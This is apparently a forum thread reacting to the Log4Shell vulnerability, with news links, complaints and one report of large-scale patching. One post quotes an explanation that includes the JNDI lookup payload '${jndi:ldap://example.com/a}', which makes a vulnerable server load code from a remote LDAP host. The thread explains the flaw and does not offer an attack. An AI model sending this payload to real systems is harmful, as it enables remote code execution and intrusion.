[ConservativeMind]

The direct link to BGR:

https://bgr.com/tech/internet-is-scrambling-to-fix-log4shell-the-worst-hack-in-history/

MSN did not author this article.

[vikingd00d]

What idiot thought it would be a good idea to have RCE capability in a logging utility?

[Bikkuri]

tech-ping

[KTM rider]

the anethesiologist I sent a few thousand dollars out of pocket to (for about an hours work) just sent a letter informing me that they had a data breach so I should watch out for identity theft

its a wonderful world

https://www.reuters.com/markets/euro...L6cKZXUrr6prI0

[TexasGunLover]

We've been at it (fortune 100 company) all weekend 24/7.

We have over 60k VM's with the vulnerability for over 14k applications.

[GOP Poet]

bookmark

[Fury]

The worst! IN HISTORY!

Good grief.

[SauronOfMordor]

Technical article on the exploit

https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/12/log4j-zero-day-log4shell-arrives-just-in-time-to-ruin-your-weekend/

The vulnerability is triggered by a simple string sent to a vulnerable server:

${jndi:ldap://example.com/a}

When the vulnerable application logs the string it triggers a lookup to an attacker-controlled remote LDAP server (example.com in our scenario). The response from the malicious server contains a path to a remote Java class file that’s injected into the server process. Attackers can execute commands with the same level of privilege as the application that uses the logging library.

[NetAddicted]

Rd later.

[ShadowAce]